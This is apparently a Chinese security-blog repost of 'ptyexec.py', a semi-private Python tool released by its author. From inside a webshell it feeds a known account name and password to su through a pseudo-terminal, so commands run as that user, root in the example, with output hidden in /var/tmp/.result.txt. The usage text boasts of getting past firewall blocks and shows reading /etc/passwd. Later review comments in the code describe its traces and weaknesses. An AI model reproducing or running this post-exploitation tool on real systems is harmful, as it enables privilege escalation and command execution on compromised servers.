一个知道帐户名密码在Webshell下执行命令的脚本

# 鬼仔:xi4oyu最近搞了一个站,这个是他新站开张放出来的。

作者:xi4oyu

新站开张,放出来吧。以前是应包总之约写的。前后也没给过几个人,算是个伪私有版。

#!/usr/bin/env python
#For God sake, Keep it priv4t3

import sys,os,time,pty
def usage():
    """Print the command-line help text and exit with status 0.

    The help text documents the calling convention
    (<username> <passwd> <command>) and states that results are written
    under /var/tmp.

    NOTE(review): the exit status is 0 even though this is only reached
    when the argument count is wrong, so callers cannot tell a usage
    error from success by the return code.
    """
    help_lines = (
        "ptyexec.py: fuck the firewall block up",
        "By xi4oyu http://www.pentestday.com",
        "Usage: ptyexec.py <username> <passwd> <command>",
        'Ext: ptyexec.py root 123456 "cat /etc/passwd"',
        'Result will be located in /var/tmp',
    )
    for help_line in help_lines:
        print help_line
    sys.exit(0)

def fuck_child(pipein):
    """Child side: run /bin/sh under a pty with redirected standard streams.

    Before the shell is started, fd 0 is replaced by the read end of the
    pipe and fds 1 and 2 are pointed at /var/tmp/.result.txt, which is
    opened in append mode. The process exits with status 0 once
    pty.spawn() returns.

    Args:
        pipein: file descriptor of the pipe end the parent writes to.

    NOTE(review): the result file is a dot-file in /var/tmp that is only
    ever appended to and never removed by this script, so shell output
    from every run accumulates there. Its permissions are whatever the
    process umask yields; nothing here restricts them. On a host under
    investigation that file is a direct artifact of this script.
    NOTE(review): presumably a pty is used because su wants a terminal
    for its password prompt - the source does not say so explicitly.
    """
    # Whatever the parent writes into the pipe becomes this process's stdin.
    os.dup2(pipein, 0)

    # stdout and stderr both go to the same append-mode result file.
    result_file = open("/var/tmp/.result.txt", "a")
    result_fd = result_file.fileno()
    for std_fd in (1, 2):
        os.dup2(result_fd, std_fd)

    pty.spawn("/bin/sh")

    # Reached only after pty.spawn() returns; this text lands in the
    # result file because fd 1 was redirected above.
    print "GAGA..I'm back,Alt it never be happened"
    sys.exit(0)

def fuck_it_up(user,passwd,command):
    """Fork a pty-backed shell and type `su`, the password and a command into it.

    A pipe is created and the process forks. The child hands the read end
    to fuck_child(); the parent writes four lines into the write end, with
    a two-second pause before each one and one more before exiting:
    "su - <user>", the password, the command, and "exit".

    Args:
        user: account name placed after "su - ".
        passwd: written as the line following the su invocation.
        command: written as the line following the password.

    NOTE(review): user, passwd and command are interpolated into the
    shell's input without any quoting or validation, so every character
    in them is interpreted by the shell that reads the line.
    NOTE(review): the fixed sleeps are the only synchronization with the
    child; nothing checks that su prompted, that authentication
    succeeded, or that the command has finished.
    NOTE(review): the parent never waits for the child and never closes
    either pipe end explicitly.
    """
    pipein, pipeout = os.pipe()

    if os.fork() == 0:
        # Child process: fuck_child() terminates the process itself.
        fuck_child(pipein)
        return

    # Parent process: feed the scripted input one line at a time.
    scripted_input = (
        ('su - %s\n', user),
        ('%s\n', passwd),
        ('%s\n', command),
    )
    for template, value in scripted_input:
        time.sleep(2)
        os.write(pipeout, template % value)

    time.sleep(2)
    os.write(pipeout, 'exit\n')
    time.sleep(2)
    sys.exit(0)

if __name__ == "__main__":
    # Exactly three arguments are required: <username> <passwd> <command>.
    # usage() exits the process, so the unpacking below only runs when
    # the count is right.
    # NOTE(review): the password arrives through argv, so it sits in this
    # process's command line for the whole run (about ten seconds of
    # sleeps) - typically readable by other local users via ps or /proc
    # and recorded by any exec/process auditing on the host.
    if len(sys.argv) != 4:
        usage()
    target_user, target_passwd, shell_command = sys.argv[1:4]
    fuck_it_up(target_user, target_passwd, shell_command)
